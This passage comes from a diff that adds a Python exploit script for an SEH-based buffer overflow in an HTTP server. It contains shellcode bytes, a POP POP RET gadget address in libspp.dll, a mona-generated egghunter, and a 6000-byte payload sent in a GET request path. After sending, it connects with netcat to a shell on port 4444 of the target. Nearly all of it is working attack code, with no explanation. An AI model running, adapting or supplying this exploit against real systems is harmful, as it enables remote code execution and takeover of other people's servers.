+shellcode += "\x8a\x26\x1e\x84\x23\xaf\x96\xfd\x59\x4f\x58\xd4\xd9"
+shellcode += "\x7f\x13\x74\x4b\xe8\xfa\xed\xc9\x75\xfd\xd8\x0e\x80"
+shellcode += "\x7e\xe8\xee\x77\x9e\x99\xeb\x3c\x18\x72\x86\x2d\xcd"
+shellcode += "\x74\x35\x4d\xc4"
+
+#Buffer overflow
+junk = "A" * 2487
+
+#JMP Short = EB 05
+nSEH = "\x90\x90\xEB\x05" #Jump short 5
+#POP POP RET (libspp.dll)
+SEH = struct.pack('<L',0x100160ae)
+
+#Generated by mona.py v2.0, rev 568 - Immunity Debugger
+egg = "w00tw00t"
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+#NOPS
+nops = "\x90"
+
+#Payload
+payload = junk + nSEH + SEH + egghunter + nops * 10 + egg + shellcode + nops * (6000 - len(junk) - len(nSEH) - len(SEH) - len(egghunter) - 10 - len(egg) - len(shellcode))
+
+#HTTP Request
+request = "GET /" + payload + "HTTP/1.1" + "\r\n"
+request += "Host: " + host + "\r\n"
+request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
+request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
+request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
+request += "Accept-Encoding: gzip, deflate" + "\r\n"
+request += "Connection: keep-alive" + "\r\n\r\n"
+
+socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+socket.connect((host,port))
+socket.send(request)
+socket.close()
+
+print "Waiting for shell..."
+time.sleep(5)
+os.system("nc " + host + " 4444")